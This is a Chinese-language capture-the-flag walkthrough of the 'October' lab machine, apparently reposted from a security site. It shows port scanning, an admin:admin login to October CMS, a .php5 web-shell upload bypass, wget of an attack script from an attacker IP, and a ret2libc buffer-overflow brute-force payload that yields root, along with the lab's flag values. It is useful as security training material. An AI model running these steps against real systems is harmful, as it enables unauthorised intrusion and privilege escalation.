信息收集
IP Address | Opening Ports |
---|---|
10.10.10.16 | TCP:22,80 |
$ nmap -p- 10.10.10.16 --min-rate 1000 -sC -sV
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 79:b1:35:b6:d1:25:12:a3:0c:b5:2e:36:9c:33:26:28 (DSA)
| 2048 16:08:68:51:d1:7b:07:5a:34:66:0d:4c:d0:25:56:f5 (RSA)
| 256 e3:97:a7:92:23:72:bf:1d:09:88:85:b6:6c:17:4e:85 (ECDSA)
|_ 256 89:85:90:98:20:bf:03:5d:35:7f:4a:a9:e1:1b:65:31 (ED25519)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-title: October CMS - Vanilla
|_http-server-header: Apache/2.4.7 (Ubuntu)
| http-methods:
|_ Potentially risky methods: PUT PATCH DELETE
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
October-CMS
username:admin password:admin
Admin Login
http://10.10.10.16/backend/backend/auth/signin
http://10.10.10.16/backend/cms/media
通过上传php5后缀文件绕过
http://10.10.10.16/storage/app/media/p0wny.php5
User.txt
2e2e813cc41a0812857cb7e7cdb5daa3
权限提升 & BOF
SUID File 32Bit
www-data@october:/var/www/html/cms/storage/app/media$ find / -perm -4000 -type f 2>/dev/null
$ gdb -q ./ovrflw
gdb-peda$ checksec
-
CANARY : disabled
-
风险: 栈溢出攻击的风险增加。没有启用栈保护(Canary),意味着攻击者可以更容易地利用栈溢出漏洞来覆盖返回地址或其他关键数据,可能导致代码执行或控制流劫持。
-
FORTIFY : disabled
-
风险: 缓冲区溢出攻击的风险增加。未启用
FORTIFY_SOURCE
,编译时未进行额外的边界检查,因此缓冲区溢出等内存破坏漏洞更容易被利用。 -
NX : ENABLED
-
降低的风险: NX 已启用,意味着数据段不能被执行,减少了攻击者通过注入和执行恶意代码(如 shellcode)的可能性。这是一种有效的保护机制。
-
PIE : disabled
-
风险: 代码重用攻击的风险增加。未启用位置无关可执行文件(PIE),意味着二进制文件在每次加载时使用固定的地址空间布局,使得攻击者更容易预测并利用内存地址,进行如返回导向编程(ROP)的攻击。
-
RELRO : Partial
-
风险: 部分内存重定位攻击的风险存在。Partial RELRO 仅对部分重定位表(如全局偏移表的一部分)提供保护,攻击者可能仍然可以通过覆盖未保护的 GOT 表项来劫持程序的控制流。
www-data@october:/var/www/html/cms/storage/app/media$ cat /proc/sys/kernel/randomize_va_space
这表示系统启用了 完全地址空间布局随机化(ASLR),即最高级别的地址空间随机化。
Framework
Buffer Overflow && ROP
gdb-peda$ pattern_create 1000
gdb-peda$ run 'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%RA%oA%SA%pA%TA%qA%UA%rA%VA%tA%WA%uA%XA%vA%YA%wA%ZA%xA%yA%zAs%AssAsBAs$AsnAsCAs-As(AsDAs;As)AsEAsaAs0AsFAsbAs1AsGAscAs2AsHAsdAs3AsIAseAs4AsJAsfAs5AsKAsgAs6AsLAshAs7AsMAsiAs8AsNAsjAs9AsOAskAsPAslAsQAsmAsRAsoAsSAspAsTAsqAsUAsrAsVAstAsWAsuAsXAsvAsYAswAsZAsxAsyAszAB%ABsABBAB$ABnABCAB-AB(ABDAB;AB)ABEABaAB0ABFABbAB1ABGABcAB2ABHABdAB3ABIABeAB4ABJABfAB5ABKABgAB6ABLABhAB7ABMABiAB8ABNABjAB9ABOABkABPABlABQABmABRABoABSABpABTABqABUABrABVABtABWABuABXABvABYABwABZABxAByABzA$%A$sA$BA$$A$nA$CA$-A$(A$DA$;A$)A$EA$aA$0A$FA$bA$1A$GA$cA$2A$HA$dA$3A$IA$eA$4A$JA$fA$5A$KA$gA$6A$LA$hA$7A$MA$iA$8A$NA$jA$9A$OA$kA$PA$lA$QA$mA$RA$oA$SA$pA$TA$qA$UA$rA$VA$tA$WA$uA$XA$vA$YA$wA$ZA$x' Starting program: /tmp/ovrflw 'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%RA%oA%SA%pA%TA%qA%UA%rA%VA%tA%WA%uA%XA%vA%YA%wA%ZA%xA%yA%zAs%AssAsBAs$AsnAsCAs-As(AsDAs;As)AsEAsaAs0AsFAsbAs1AsGAscAs2AsHAsdAs3AsIAseAs4AsJAsfAs5AsKAsgAs6AsLAshAs7AsMAsiAs8AsNAsjAs9AsOAskAsPAslAsQAsmAsRAsoAsSAspAsTAsqAsUAsrAsVAstAsWAsuAsXAsvAsYAswAsZAsxAsyAszAB%ABsABBAB$ABnABCAB-AB(ABDAB;AB)ABEABaAB0ABFABbAB1ABGABcAB2ABHABdAB3ABIABeAB4ABJABfAB5ABKABgAB6ABLABhAB7ABMABiAB8ABNABjAB9ABOABkABPABlABQABmABRABoABSABpABTABqABUABrABVABtABWABuABXABvABYABwABZABxAByABzA$%A$sA$BA$$A$nA$CA$-A$(A$DA$;A$)A$EA$aA$0A$FA$bA$1A$GA$cA$2A$HA$dA$3A$IA$eA$4A$JA$fA$5A$KA$gA$6A$LA$hA$7A$MA$iA$8A$NA$jA$9A$OA$kA$PA$lA$QA$mA$RA$oA$SA$pA$TA$qA$UA$rA$VA$tA$WA$uA$XA$vA$YA$wA$ZA$x'
gdb-peda$ pattern_offset AA8A
偏移量112
www-data@october:/tmp$ ./rops.sh /usr/local/bin/ovrflw
https://github.com/MartinxMax/ROPS
ROP链自动构造,由于启用了ASLR,所以libc地址是变化的。所以我们需要循环尝试payload
www-data@october:/tmp$ wget http://10.10.16.17/rops.sh;chmod +x rops.sh
www-data@october:/tmp$ ./rops.sh /usr/local/bin/ovrflw
www-data@october:/tmp$ while true; do /usr/local/bin/ovrflw $(python -c 'print "x90"*112 + "x10x83x63xb7" + "x60xb2x62xb7" + "xacxabx75xb7"'); done
Root.txt
85319abefab83f503bc66023fa1c3e42
作者:maptnh
链接:[Meachines] [Medium] October October-CMS+BOF-ROP链自... - FreeBuf网络安全行业门户
原文始发于微信公众号(船山信安):[Meachines] [Medium] October October-CMS+BOF-ROP链自...
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论